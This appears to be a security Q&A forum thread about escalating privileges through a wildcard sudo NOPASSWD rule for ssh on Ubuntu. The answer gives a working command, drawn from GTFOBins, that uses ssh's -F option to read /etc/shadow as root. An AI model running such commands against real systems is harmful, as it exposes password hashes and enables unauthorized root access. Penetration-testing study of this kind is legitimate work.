Possible to inject in the middle of a ROOT NOPASSWD command with a wild card?

Question

I'm testing for privilege escalations on a Ubuntu 18.04 host, and after running sudo -l , I've discovered a couple of root NOPASSWD commands for a standard user (w/unknown password). These commands contain wild cards.

Example: (root) NOPASSWD: /usr/bin/ssh * /path/to/bash/script.sh

I've already attempted to inject root commands, without any luck.

Failed Attempt: /usr/bin/ssh user@localhost "cat /etc/shadow" ; /path/to/bash/script.sh

Is it possible to get command injection in such a case, and get commands to run with sudo privileges?

Any advice is appreciated.

Duck · Answer 1 · 2021-02-25T04:41:33.490

Well after beating my head against numerous commands, I finally found that I could escape the wild card and cat out /etc/shadow

...With a little help from this cheat sheet

https://gtfobins.github.io/
https://gtfobins.github.io/gtfobins/ssh/#sudo (more specifically)

$LFILE=/etc/shadow

Success: sudo /usr/bin/ssh user@localhost -F $LFILE /path/to/bash/script.sh

Hope this helps someone in the future. :) Cheers!

Possible to inject in the middle of a ROOT NOPASSWD command with a wild card?

1 Answers1